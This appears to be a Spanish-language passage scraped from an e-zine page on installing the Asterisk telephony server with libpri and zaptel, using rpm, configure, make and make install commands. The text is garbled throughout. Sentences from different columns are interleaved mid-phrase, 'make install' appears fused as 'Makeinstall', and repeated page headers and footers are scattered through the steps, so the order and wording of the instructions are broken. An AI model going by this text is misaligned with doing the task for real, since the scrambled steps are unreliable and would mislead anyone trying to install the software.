Luego de descargar el paquete existen 2 formas de comienzan a descomprimirse:
instalarlo.
rpm -i paquete.rpm
rpm -Uvh paquete.rpm
Instalando Libpri
cd /ruta/de/codigo/libpri
make
make install
#mkdir asterisk
Luego de esto procedemos a descomprimir e instalar Luego de que se acabe esta primera parte
escribimos make install como se indico en las
Si se desea optimizar el descomprimir los archivos indicaciones anteriores
rápidamente se lo puede hacer en una sola línea
./configure
make
make install
make samples
cd /usr/src/asterisk/zaptel
# Si tienes kernel a 2.4 solo se debe escribir make
make
# Si tienes kernel a 2.6 solo se debe escribir make
linux26
make linux26 - Si tienes kernel a 2.6
Instalando Asterisk:
cd /usr/src/asterisk/asterisk
# Antes se debe tener instalado el paquete de
Asterisk mpg123 package (para archives mp3 en
Networking & wireless
Instalacion de Asterisk II CUH e-zine 3ª Edicion
Luego debemos digitar make install como nos indica
la propia instalación de asterisk
Makeinstall
Saludos
JUCA
www.hackeruna.com
Hacking Newbie
Utilidades MSN CUH e-zine 3ª Edicion
Modding Gallery 3
Modding Gallery
Hacking Newbie
Utilidades MSN CUH e-zine 3ª Edicion
Hacking Newbie
Utilidades MSN CUH e-zine 3ª Edicion